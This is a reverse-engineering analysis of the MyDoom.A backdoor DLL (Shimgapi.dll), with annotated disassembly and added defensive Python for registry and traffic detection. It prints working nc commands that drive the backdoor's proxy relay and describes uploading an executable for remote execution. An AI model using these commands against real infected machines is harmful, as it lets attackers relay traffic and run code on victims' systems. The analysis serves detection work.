Analysis of Shimgapi.dll for MyDoom.a


Tombkeeper # Whitecell.org

The MyDoom.A backdoor exists as a DLL and loads itself into the address space of the Explorer process (the Windows shell) by modifying the corresponding registry value.

Under normal circumstances the registry looks like this:

HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32
    (Default)        REG_EXPAND_SZ    %SystemRoot%\System32\WebCheck.dll
    ThreadingModel   REG_SZ           Apartment

MyDoom.A replaces the %SystemRoot%\System32\WebCheck.dll in that value with the path of its own Shimgapi.dll.
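As an added example (not code from the article), the following Python snippet checks the InprocServer32 value that MyDoom.A hijacks. classify_inprocserver32() works on a value string pulled from a registry export or an offline hive, with the %SystemRoot% expansion supplied as a dict so the check can be run against another machine's data; read_live_value() reads the live key through winreg on Windows. The CLSID, the expected WebCheck.dll path and the Shimgapi.dll indicator come from the article; the function names and the sample environment are this example's own.

```python
"""Check the WebCheck CLSID InprocServer32 value that MyDoom.A redirects.

Added example, not part of the original article. The CLSID and the stock
path are the ones the article lists; everything else is this example's own.
"""
import ntpath
import re
import sys
from typing import Dict, Tuple

WEBCHECK_CLSID = '{E6FB5E20-DE35-11CF-9C87-00AA005127ED}'
SUBKEY = 'CLSID\\' + WEBCHECK_CLSID + '\\InprocServer32'
EXPECTED = r'%SystemRoot%\System32\WebCheck.dll'   # stock REG_EXPAND_SZ value
INDICATOR = 'shimgapi.dll'                          # file name MyDoom.A installs


def expand_env(value: str, env: Dict[str, str]) -> str:
    """Expand %VAR% references the way a REG_EXPAND_SZ value is expanded (names are case-insensitive)."""
    lookup = {k.lower(): v for k, v in env.items()}
    return re.sub(r'%([^%]+)%',
                  lambda m: lookup.get(m.group(1).lower(), m.group(0)), value)


def normalise(path: str, env: Dict[str, str]) -> str:
    """Expand, strip quotes, collapse separators and lower-case so paths compare reliably."""
    return ntpath.normcase(ntpath.normpath(expand_env(path.strip().strip('"'), env)))


def classify_inprocserver32(value: str, env: Dict[str, str]) -> Tuple[bool, str]:
    """Return (clean, reason): clean means the in-process server is still WebCheck.dll."""
    got = normalise(value, env)
    want = normalise(EXPECTED, env)
    if got == want:
        return True, 'InprocServer32 still points to the stock ' + want
    if ntpath.basename(got) == INDICATOR:
        return False, 'MyDoom.A indicator: WebCheck CLSID redirected to ' + got
    return False, 'unexpected in-process server ' + got + ' (expected ' + want + ')'


def read_live_value() -> str:
    """Windows only: read the (Default) value of the InprocServer32 key."""
    if sys.platform != 'win32':
        raise OSError('live registry access needs Windows; use an exported value instead')
    import winreg  # only importable on Windows
    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, SUBKEY) as key:
        value, _kind = winreg.QueryValueEx(key, '')
        return value


if __name__ == '__main__':
    env = {'SystemRoot': r'C:\WINDOWS'}   # constructed sample environment
    samples = [                            # constructed sample registry values
        EXPECTED,
        r'%SystemRoot%\system32\WEBCHECK.DLL',
        r'C:\WINDOWS\System32\shimgapi.dll',
        r'C:\Program Files\Other\thing.dll',
    ]
    for sample in samples:
        clean, reason = classify_inprocserver32(sample, env)
        print('CLEAN ' if clean else 'ALERT ', sample, '->', reason)
```

On a live machine call read_live_value() and pass the result to classify_inprocserver32() together with os.environ; against an exported hive, pass the exported string and the SystemRoot of the machine the hive came from.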

By default, the Shimgapi.dll backdoor listens on port 3127; if that port is already in use it moves to the next port, but never beyond 3198.

This backdoor provides two functions:

1. a port-forwarding proxy;

2. a backdoor that receives an uploaded program and executes it.

Related code:

.text:7E1A1C44 sub_7E1A1C44    proc near               ; DATA XREF: start+19o
.text:7E1A1C44
.text:7E1A1C44 WSAData         = WSAData ptr -190h
.text:7E1A1C44
.text:7E1A1C44                 sub     esp, 190h
.text:7E1A1C4A                 push    esi
.text:7E1A1C4B                 push    edi
.text:7E1A1C4C                 call    sub_7E1A1A1F
.text:7E1A1C51                 lea     eax, [esp+198h+WSAData]
.text:7E1A1C55                 push    eax             ; lpWSAData
.text:7E1A1C56                 push    2               ; wVersionRequested
.text:7E1A1C58                 call    ds:WSAStartup
.text:7E1A1C5E                 call    Address
.text:7E1A1C63                 mov     edi, ds:Sleep
.text:7E1A1C69                 mov     esi, 0C37h      ; listen on port 3127
.text:7E1A1C6E
.text:7E1A1C6E loc_7E1A1C6E:                           ; CODE XREF: sub_7E1A1C44+50j
.text:7E1A1C6E                 push    3
.text:7E1A1C70                 push    esi
.text:7E1A1C71                 call    sub_7E1A1B52    ; bind subroutine
.text:7E1A1C76                 pop     ecx
.text:7E1A1C77                 pop     ecx
.text:7E1A1C78                 push    400h            ; dwMilliseconds
.text:7E1A1C7D                 call    edi             ; Sleep
.text:7E1A1C7F                 cmp     esi, 0C7Eh      ; port must not exceed 3198
.text:7E1A1C85                 jle     short loc_7E1A1C93
.text:7E1A1C87                 push    800h            ; dwMilliseconds
.text:7E1A1C8C                 call    edi             ; Sleep
.text:7E1A1C8E                 mov     esi, 0C37h      ; back to 3127
.text:7E1A1C93
.text:7E1A1C93 loc_7E1A1C93:                           ; CODE XREF: sub_7E1A1C44+41j
.text:7E1A1C93                 inc     esi             ; next port, then bind again
.text:7E1A1C94                 jmp     short loc_7E1A1C6E
.text:7E1A1C94 sub_7E1A1C44    endp

When port 3127 receives a connection and the first byte received is \x04, the DLL enters the port-forwarding path: it checks that the second byte is 0x01, takes bytes 5 to 8 as the target IP address and bytes 3 and 4 as the target port, connects to that target, and forwards data between the new socket and the current one.

For example, we use \x00\x6e\xc0\xa8\x01\x0b as the connection instruction, where \x00\x6e is port 110 and \xc0\xa8\x01\x0b is 192.168.1.11:

# printf "\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127
Z+OK Microsoft Exchange Server 2003 POP3 server version 6.5.6944.0 ready.

As can be seen, the session with port 110 on 192.168.1.11 is relayed back. Note that some extra bytes precede the returned banner. Test again:

# printf "\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127 | xxd -g 1
0000000: 04 5a 00 6e c0 a8 01 0b 2b 4f 4b 20 4d 69 63 72  .Z.n....+OK Micr
0000010: 6f 73 6f 66 74 20 45 78 63 68 61 6e 67 65 20 53  osoft Exchange S
0000020: 65 72 76 65 72 20 32 30 30 33 20 50 4f 50 33 20  erver 2003 POP3 
0000030: 73 65 72 76 65 72 20 76 65 72 73 69 6f 6e 20 36  server version 6
0000040: 2e 35 2e 36 39 34 34 2e 30 20 28 64 63 2e 69 6e  .5.6944.0 (dc.in

Now try a connection instruction for port 98, on which nothing is listening:

# printf "\x04\x01\x00\x62\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127 | xxd -g 1
0000000: 04 5b 00 62 c0 a8 01 0b                          .[.b....

Clearly these bytes report the connection state: 04 5A means the connection succeeded and 04 5B means it failed. The remaining bytes echo the connection instruction that was sent. This feature is probably designed so that the worm can recognise its own clients.

Related code:

.text:7E1A17F5
.text:7E1A17F5 loc_7E1A17F5:                           ; CODE XREF: sub_7E1A17BA+2Bj
.text:7E1A17F5                 cmp     byte ptr [ebp-1], 4 ; is the first byte 0x04?
.text:7E1A17F9                 push    ebx
.text:7E1A17FA                 jnz     loc_7E1A18B7    ; first byte is not 0x04: go to exit
.text:7E1A1800                 xor     ebx, ebx
.text:7E1A1802
.text:7E1A1802 loc_7E1A1802:                           ; CODE XREF: sub_7E1A17BA+65j
.text:7E1A1802                 push    0               ; flags
.text:7E1A1804                 push    8
.text:7E1A1806                 pop     eax
.text:7E1A1807                 sub     eax, ebx
.text:7E1A1809                 push    eax             ; len
.text:7E1A180A                 lea     eax, [ebp+ebx+buf]
.text:7E1A180E                 push    eax             ; buf
.text:7E1A180F                 push    [ebp+s]         ; s
.text:7E1A1812                 call    esi             ; recv
.text:7E1A1814                 test    eax, eax
.text:7E1A1816                 jl      short loc_7E1A1823
.text:7E1A1818                 jz      short loc_7E1A1825
.text:7E1A181A                 add     ebx, eax
.text:7E1A181C                 cmp     ebx, 8          ; fewer than 8 bytes received so far?
.text:7E1A181F                 jl      short loc_7E1A1802 ; keep calling recv
.text:7E1A1821                 jmp     short loc_7E1A1825
.text:7E1A1823 ; ---------------------------------------------------------------------------
.text:7E1A1823
.text:7E1A1823 loc_7E1A1823:                           ; CODE XREF: sub_7E1A17BA+5Cj
.text:7E1A1823                 mov     ebx, eax
.text:7E1A1825
.text:7E1A1825 loc_7E1A1825:                           ; CODE XREF: sub_7E1A17BA+5Ej
.text:7E1A1825                                         ; sub_7E1A17BA+67j
.text:7E1A1825                 cmp     ebx, 8
.text:7E1A1828                 jnz     loc_7E1A1907
.text:7E1A182E                 jmp     short loc_7E1A1836
.text:7E1A1830 ; ---------------------------------------------------------------------------
.text:7E1A1830
.text:7E1A1830 loc_7E1A1830:                           ; CODE XREF: sub_7E1A17BA+8Cj
.text:7E1A1830                 cmp     [ebp+var_2], 0  ; is the byte after the 8-byte header 0x00, i.e. were exactly 8 bytes sent?
.text:7E1A1834                 jz      short loc_7E1A184A
.text:7E1A1836
.text:7E1A1836 loc_7E1A1836:                           ; CODE XREF: sub_7E1A17BA+74j
.text:7E1A1836                 push    0
.text:7E1A1838                 lea     eax, [ebp+var_2]
.text:7E1A183B                 push    1
.text:7E1A183D                 push    eax
.text:7E1A183E                 push    [ebp+s]
.text:7E1A1841                 call    esi
.text:7E1A1843                 cmp     eax, 1
.text:7E1A1846                 jz      short loc_7E1A1830
.text:7E1A1848                 jmp     short loc_7E1A18B7
.text:7E1A184A ; ---------------------------------------------------------------------------
.text:7E1A184A
.text:7E1A184A loc_7E1A184A:                           ; CODE XREF: sub_7E1A17BA+7Aj
.text:7E1A184A                 cmp     [ebp+buf], 4    ; check again that the first byte is 0x04
.text:7E1A184E                 jnz     short loc_7E1A18B7
.text:7E1A1850                 cmp     byte ptr [ebp-0Fh], 1 ; second byte must be 0x01 to continue, otherwise exit
.text:7E1A1854                 jnz     short loc_7E1A18B7
.text:7E1A1856                 cmp     [ebp+hostlong], 0 ; examine the last four bytes (the IP)
.text:7E1A185A                 jz      short loc_7E1A187C
.text:7E1A185C                 push    [ebp+hostlong]  ; hostlong
.text:7E1A185F                 call    ds:htonl
.text:7E1A1865                 test    eax, 0FFFFFF00h ; mask the IP with 255.255.255.0
.text:7E1A186A                 jnz     short loc_7E1A187C
.text:7E1A186C                 push    [ebp+s]
.text:7E1A186F                 lea     ebx, [ebp+hostlong]
.text:7E1A1872                 call    sub_7E1A1664
.text:7E1A1877                 test    eax, eax
.text:7E1A1879                 pop     ecx
.text:7E1A187A                 jnz     short loc_7E1A18B7
.text:7E1A187C
.text:7E1A187C loc_7E1A187C:                           ; CODE XREF: sub_7E1A17BA+A0j
.text:7E1A187C                                         ; sub_7E1A17BA+B0j
.text:7E1A187C                 mov     ax, [ebp-0Eh]   ; take two bytes as the port
.text:7E1A1880                 push    6               ; protocol
.text:7E1A1882                 mov     word ptr [ebp+name.sa_data], ax
.text:7E1A1886                 mov     eax, [ebp+hostlong]
.text:7E1A1889                 push    1               ; type
.text:7E1A188B                 push    2               ; af
.text:7E1A188D                 mov     [ebp+name.sa_family], 2
.text:7E1A1893                 mov     dword ptr [ebp+name.sa_data+2], eax
.text:7E1A1896                 call    ds:socket
.text:7E1A189C                 cmp     eax, 0FFFFFFFFh
.text:7E1A189F                 mov     [ebp+var_8], eax
.text:7E1A18A2                 jz      short loc_7E1A18B7
.text:7E1A18A4                 lea     eax, [ebp+name]
.text:7E1A18A7                 push    10h             ; namelen
.text:7E1A18A9                 push    eax             ; name
.text:7E1A18AA                 push    [ebp+var_8]     ; s
.text:7E1A18AD                 call    ds:connect
.text:7E1A18B3                 test    eax, eax
.text:7E1A18B5                 jz      short loc_7E1A18D2
.text:7E1A18B7
.text:7E1A18B7 loc_7E1A18B7:                           ; CODE XREF: sub_7E1A17BA+40j
.text:7E1A18B7                                         ; sub_7E1A17BA+8Ej ...
.text:7E1A18B7                 push    0               ; flags
.text:7E1A18B9                 lea     eax, [ebp+buf]
.text:7E1A18BC                 push    8               ; len
.text:7E1A18BE                 push    eax             ; buf
.text:7E1A18BF                 push    [ebp+s]         ; s
.text:7E1A18C2                 mov     [ebp+buf], 4
.text:7E1A18C6                 mov     byte ptr [ebp-0Fh], 5Bh ; connection failed: reply 0x5B
.text:7E1A18CA                 call    ds:send
.text:7E1A18D0                 jmp     short loc_7E1A18F8
.text:7E1A18D2 ; ---------------------------------------------------------------------------
.text:7E1A18D2
.text:7E1A18D2 loc_7E1A18D2:                           ; CODE XREF: sub_7E1A17BA+FBj
.text:7E1A18D2                 push    0               ; flags
.text:7E1A18D4                 lea     eax, [ebp+buf]
.text:7E1A18D7                 push    8               ; len
.text:7E1A18D9                 push    eax             ; buf
.text:7E1A18DA                 push    [ebp+s]         ; s
.text:7E1A18DD                 mov     [ebp+buf], 4
.text:7E1A18E1                 mov     byte ptr [ebp-0Fh], 5Ah ; connection succeeded: reply 0x5A
.text:7E1A18E5                 call    ds:send
.text:7E1A18EB                 push    [ebp+var_8]
.text:7E1A18EE                 push    [ebp+s]
.text:7E1A18F1                 call    sub_7E1A16D3
.text:7E1A18F6                 pop     ecx
.text:7E1A18F7                 pop     ecx

If the first byte received is \xQQ and bytes 2 to 5 are \xPP\xPP\xPP\xPP, everything from the sixth byte onward is received and saved as a file in the temporary folder, launched with CreateProcess, and deleted after the program exits.

That is, as long as we prepend the five bytes \xQQ\xPP\xPP\xPP\xPP to any executable and send it as data to port 3127 of a machine infected with the MyDoom.A worm, the file will be executed on that system. I prepended this magic header to the system's calculator program with UltraEdit and transmitted it with nc, and it executed successfully.

# xxd -g 1 -l 64 calc.exe
0000000: QQ PP PP PP PP 4d 5a 90 00 03 00 00 00 00 00 00  .....MZ.........
0000010: 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

# nc 192.168.7.33 3127
^C

Related code: omitted.
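As an added example (not code from the article or from the worm), the following Python decoder implements the wire formats recovered above so that traffic captured on ports 3127 to 3198 can be triaged: the 8-byte proxy request with its 0x00-terminated trailer, the 04 5A / 04 5B status reply that echoes the request, and the upload-and-execute command. The five upload magic bytes are elided in the article (QQ PP PP PP PP), so the decoder does not know them and keys on the MZ header at offset 5 instead. The port-range helper, the verdict names and the sample byte strings (the article's own test captures, plus a constructed upload whose magic header is a zero placeholder) are this example's own.

```python
"""Triage bytes seen on the MyDoom.A backdoor port range.

Added example for this page, not code from the article or the worm. The
message layouts are the ones the article reads out of the disassembly; the
upload magic bytes are not known here and are never checked.
"""
import socket
import struct
from dataclasses import dataclass
from typing import Optional, Tuple

BACKDOOR_PORT_FIRST = 3127     # mov esi, 0C37h
BACKDOOR_PORT_LAST = 3198      # cmp esi, 0C7Eh
PROXY_VERSION = 0x04           # first byte of request and reply
PROXY_CONNECT = 0x01           # second byte of a request
REPLY_GRANTED = 0x5A           # second byte of a reply: connect succeeded
REPLY_REJECTED = 0x5B          # second byte of a reply: connect failed
HEADER = struct.Struct('!BBH4s')   # version, cmd/status, big-endian port, raw IPv4


def is_backdoor_port(port: int) -> bool:
    """True for every port the DLL can end up bound to (3127, then +1 up to 3198)."""
    return BACKDOOR_PORT_FIRST <= port <= BACKDOOR_PORT_LAST


@dataclass
class Verdict:
    kind: str                                   # proxy-connect / proxy-reply / upload / incomplete / unknown
    detail: str
    target: Optional[Tuple[str, int]] = None    # (ip, port) carried by proxy messages


def parse_to_backdoor(data: bytes) -> Verdict:
    """Decode what a client sent to the backdoor port."""
    if len(data) < HEADER.size:
        return Verdict('incomplete', f'{len(data)} of {HEADER.size} header bytes seen')
    vn, cd, port, raw_ip = HEADER.unpack_from(data)
    if vn == PROXY_VERSION:
        if cd != PROXY_CONNECT:
            return Verdict('unknown', f'0x04 header but second byte is {cd:#04x}; the DLL drops it')
        # after the 8-byte header the DLL reads one byte at a time until it sees 0x00
        if data.find(b'\x00', HEADER.size) == -1:
            return Verdict('incomplete', 'no 0x00 terminator after the 8-byte header yet')
        ip = socket.inet_ntoa(raw_ip)
        note = ''
        if raw_ip != b'\x00\x00\x00\x00' and raw_ip[:3] == b'\x00\x00\x00':
            # fails the 255.255.255.0 mask test: the DLL hands it to sub_7E1A1664 first
            note = ' (0.0.0.x address, passed to a separate routine in the DLL)'
        return Verdict('proxy-connect', f'relay requested to {ip}:{port}{note}', (ip, port))
    if data[5:7] == b'MZ':
        return Verdict('upload', 'PE image at offset 5 behind a 5-byte header: upload-and-execute')
    return Verdict('unknown', f'first byte {vn:#04x} is neither 0x04 nor a recognised upload')


def parse_from_backdoor(data: bytes) -> Verdict:
    """Decode what the backdoor sent back to a client."""
    if len(data) < HEADER.size:
        return Verdict('incomplete', f'{len(data)} of {HEADER.size} reply bytes seen')
    vn, status, port, raw_ip = HEADER.unpack_from(data)
    if vn != PROXY_VERSION or status not in (REPLY_GRANTED, REPLY_REJECTED):
        return Verdict('unknown', 'not an 04 5A / 04 5B status reply')
    ip = socket.inet_ntoa(raw_ip)   # the reply echoes the port and IP from the request
    if status == REPLY_GRANTED:
        relayed = len(data) - HEADER.size
        return Verdict('proxy-reply', f'connection to {ip}:{port} granted, {relayed} relayed bytes follow', (ip, port))
    return Verdict('proxy-reply', f'connection to {ip}:{port} rejected', (ip, port))


if __name__ == '__main__':
    # the article's own captures, re-typed here as byte strings, plus a constructed upload
    samples = [
        ('client', bytes.fromhex('0401006ec0a8010b00')),
        ('server', bytes.fromhex('045a006ec0a8010b2b4f4b204d696372')),
        ('client', bytes.fromhex('04010062c0a8010b00')),
        ('server', bytes.fromhex('045b0062c0a8010b')),
        ('client', b'\x00' * 5 + b'MZ\x90\x00'),   # zero placeholder: real magic bytes not given
    ]
    for direction, payload in samples:
        v = parse_to_backdoor(payload) if direction == 'client' else parse_from_backdoor(payload)
        print(f'{direction:6} {payload[:8].hex(" "):24} {v.kind:14} {v.detail}')
```

Feed parse_to_backdoor() the client-to-server side of a stream whose destination port satisfies is_backdoor_port() and parse_from_backdoor() the other direction; because every reply echoes the request, an 04 5A reply alone is enough to recover the relay target when only the server side was captured.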

When reposting, please cite the original URL: https://www.9cbs.com/read-58351.html
